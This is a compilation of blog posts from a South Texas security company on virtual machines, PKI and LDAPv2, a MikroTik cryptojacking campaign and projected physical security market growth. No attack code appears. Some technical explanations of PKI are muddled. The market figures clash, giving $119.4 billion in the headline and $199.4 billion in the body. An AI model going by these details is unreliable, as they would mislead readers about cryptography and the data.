Virtual Machines and The Cloud

Cloud-based services have grown to monopolize some segments of the tech fields. In many cases, it is simply more economically feasible to go to companies like Amazon and make use of their distributed computational infrastructure than to purchase and run servers on location. Here we will look at some of the options available, and what parts of an enterprise can be virtualized.

Virtualization involves the use of what are called VMs or Virtual Machines. A program such as VMware or VirtualBox allows the real-time simulation of various operating systems from Linux, Mac, and Windows to less well known OS’s such as those used for routers and on Cisco devices. In many cases, companies choose to use virtual machines instead of physical hardware to more cheaply and efficiently operate high-traffic scenarios.

Virtual machines can either be run “bare-metal”, meaning directly on the hardware and below any other operating system, or in the previously mentioned hypervisor programs which are capable of managing multiple virtual machines on one physical machine so long as the computational power and memory exists to do so. These are known respectively as Type 1 and Type 2 hypervisors.

Type 1/bare-metal hypervisors without an underlying OS have the advantage of having no OS or device drivers to contend with for resources and are generally regarded as the most efficient form of hypervisor with the best performance. Some examples are VMware ESXi, Microsoft Hyper-v server and open source KVM. These hypervisors are also highly secure. The kinds of vulnerabilities intrinsic to Type 2 hypervisors are absent from bare-metal solutions due to the removal of the attack surface of Type-2 running on the underlying OS of the physical machine. This provides for the logical isolation of Type-1 hypervisors against attack.

Type-2 hypervisors have an unavoidable latency because all their work must pass through the host’s OS. Any security flaws in the OS (of which Windows in particular has many) could potentially compromise all VMs running above it. Because of this, Type-2 hypervisors are typically not used for data centers, instead being used more on end-user systems and in situations where performance and security are not as great a concern. These hypervisors are often used by developers to test products before release.

Both types use something called “hardware acceleration” to different degrees, though Type-2 hypervisors can fall back on software emulation if the native hardware is not supported on the computer. Hardware acceleration includes Intel Virtualization Technology extensions and AMD extensions for those CPU types.

The appeal of virtual machines is obvious. Whereas in the past it was necessary to have a physical infrastructure of servers to support even relatively basic enterprises, companies now can choose to use a subscription to a service dedicated to hosting this storage and processing power off-site. Virtual machines move this infrastructure into a logical space and reduce attack surface and costs associated with having a sprawling network of machines on-site. Firewalls are often virtualized today, as are the resources responsible for single-sign on for end users and user authentication.


Source: vapour-apps.com

————————————————————————————–

Contact us at     admin@gostst.com

   or call 24/7        (210)-446-4863

PKI (Public Key Infrastructure) and LDAPv2

Public Key Infrastructure (PKI) is the set of standards and methods required to manage the process of generating digital certificates and creating cryptographic methods of communication between parties. PKI allows for information to be securely moved through networks and is used in a vast array of network based activities. Essentially, a public key is provided by some entity or party (held on a server) to be verified against the private key, which is specific to an individual.

Fundamentally, PKI is about cryptography. An example of this type of infrastructure in use is during the process of a cryptomalware ransomware attack. In this case, the threat actor (who has encrypted the files of the victim) holds the private key. He makes available the public key, and upon payment of the ransom, hopefully he releases the private key to the victim for decryption.

PKI is also used in industries such as banking and generally in situations where a password would be insufficient to confirm the identity of the parties involved.

——————————————————————————————————

RFC and Internet Draft

 Internet Drafts (I-D) are essentially technical documents which are published by the IETF. They contain research related to networking and sometimes are intended to end up as an RFC (Request For Comments). This RFC, developed by computer scientists and network experts will then be submitted for peer review. Some RFCs will be adopted by the IETF as standards, though some are purely research or experimental in nature.

LDAPv2

Here we will take a look at one particular standard, LDAPv2. LDAP is an acronym for Lightweight Directory Access Protocol. LDAPv2 was developed as a vendor-neutral protocol for accessing X.500 directory standards, but being as it was developed in 1995, a number of vulnerabilities have emerged over timeAccording to the document, LDAPv2 does not support modern authentication mechanisms” such as as Kerberos V.

One of its core features is its ability to maintain central storage of passwords and usernames, however in the document provided at datatracker.ietf.org/doc/rfc3494, LDAPv2 is being recommended for retirement, due in part to the fact that it fails to “provide any mechanism for data integrity or confidentiality”. The text goes on to talk about LDAPv3 and its support for stronger authentication and confidentiality, thereby more adequately fulfilling the “CIA” model of information security. The author recommends moving LDAPv2 to “Historic” status, meaning that developers should no longer use it and therefore consider it obsolete and vulnerable to exploitation.

——————————————————————————————————

The Pros and Cons of PKI

There is an argument to be made that in some cases, PKI can simply be unnecessary, especially when it is easier to implement two-factor authentication such as OTP (One Time Password) tokens or smart cards. Maintaining a PKI infrastructure can be complicated, time-consuming and expensive, and thus some organizations choose to outsource the job. However, the primary advantage of using PKI through SSH (Secure Shell) is its high degree of security. So long as the private-key is kept secret, a threat actor would not be able to execute a dictionary (brute-force) attack to crack a user’s password.

——————————————————————————————————

To sum up, the Advantages of PKI lie in the fact that it is vastly more secure than a simple password system, as a threat actor must obtain not only the cleartext or hashed password, but also the private key in order to impersonate a user.

The Disadvantages are primarily related to the lack of scalability, especially in larger environments. Furthermore, in some situations, the use of PKI could simply be considered overkill, and two-factor, OTP, or CAC may be the superior option.

Source: datatracker.ietf.org/doc/rfc3494rity.

——————————————————————————————————

 Contact Security Technology of South Texas, Inc.  Today at
210-446-4863

Cryptojacking Attack Infects Thousands of ISP-Grade Routers

Cryptomining attack scripts, sometimes referred to as cryptojacking, are a subtle form of malware designed to harness the power of your CPU to mine cryptocurrency for those who develop them. These malware can be spread through infected files and the usual vectors of transmission. Cryptomining can also take place with our without your tacet consent on websites, especially those associated with torrenting and distribution of copywrited materials.

In this case however, a more sophisticated approach has been taken in an effort to spread the reach of the mining campaign through compromising industrial, ISP-grade routers. A hacking campaign has compromised “tens of thousands of MikroTik routers to embed Coinhive cryptomining scripts in websites using a known vulnerability.” (threatpost.com)

Censys.io reports that over 170,000 active Mikrotik devices were infected with the CoinHive site-key ( a single site-key was found across all infections, which indicates a single entity to be behind the attacks). Although the campaign appeared to originally target Brazil, infections are still growing internationally. A search on Shodan (a search engine for security researchers) shows growing tens of thousands of compromised routers outside of Brazil.

MikroTik routers are employed by large enterprises and ISPs in order to serve web pages to multiple thousands or more users each day. This means that each instance of compromise could pay out big for the threat actor.

This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible,” Trustwave researcher Simon Kenin wrote. “This attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale.”

We’re … talking about potentially millions of daily pages for the attacker,” Kenin wrote. “The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end-user computers, they would go straight to the source: carrier-grade router devices.”

————————————————————————————–

Known Vulnerabilities 

Because the attack capitalizes on a known vulnerability, it is a prime example of what enterprises of all sizes risk when they delay or prevent installation of developer patches. The attack takes advantage of a vulnerability that was actually fixed by MikroTik in a previous patch.

Whoever is behind the attack, it appears they have an intimate understanding of the functionality of this particular router.

Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited,” explained Kenin.

Any MikroTik router users should make sure that their RouterOS is current with security patches, lest they fall prey to this latest cryptojacking campaign. 

The end user still has a few options as well, as cryptojacking can be halted in the web browser itself using (MinerBlock extension) or at the local firewall (CoinBlockerLists). Because the CoinHive script is injected into HTTP traffic, it can generally be avoided by forcing requests to be made over the secure version, HTTPS, depending of course on whether or not the site being accessed supports it.


Source: Threatpost.com  

————————————————————————————–
Contact us at     admin@gostst.com
  
 or call 24/7        (210)-446-4863

$119.4 Billion: Projected Growth of Physical Security Market by 2023

 

Simply put, the physical security market consists of all the security solutions you can walk up to and touch. Cameras, virtual gate guard systems, HOA management systems and more all have elements of physical security. Of course, because all of these solutions are deeply integrated with network and cloud-based technologies, cybersecurity could be considered to be equally important, but is not what we are looking at in this article

 

As risk continues to rise with rapid progress sometimes leaving vulnerabilities unchecked, the demand for physical security, the tried and true barrier between real assets and those seeking to steal or destroy them, will grow along with the risk.

 

A combination of fear generated from media responses to so-called “terror attacks”, advancements in tech in general, and the growing use of IP cameras to perform video surveillance are expected to push the growth of the physical security market worldwide.

According to this report:

https://www.researchandmarkets.com/research/snkm2j/global_physical?w=5

 this growth is expected to be from $84.1 billion in 2018 to $199.4 billion by 2023 with a CAGR (compound annual growth rate) of 7.3%.

 

This report details how the services segment of the market is expected to have the fastest growth rate. Physical security is indispensable for enhancing existing video surveillance through integration of digital (IP) solutions and integrating them with modern IT and network environments.

 

Of course, the larger enterprises are expected to be at the bleeding edge as this all occurs over the next few years, but this doesn’t mean that small or medium businesses need to miss out. While the big players have the greatest pools of revenue to draw from and more infrastructure to protect, the smaller enterprises can see just as much or greater benefit by implementing integrated IP-based physical security sooner rather than later. The best time to step up your security will always be before the attack comes, and not as a reactive measure.

 

 Security Technology of South Texas is a leading provider of cutting-edge physical security products. We have the experience and attention to detail to give you the best for your money when it comes to IP cameras, access control solutions, monitored video, and more.

—————————————————————————————————————————
Contact us at admin@gostst.com
or call 24/7     (210)-446-4863
                 https://securitytoday.com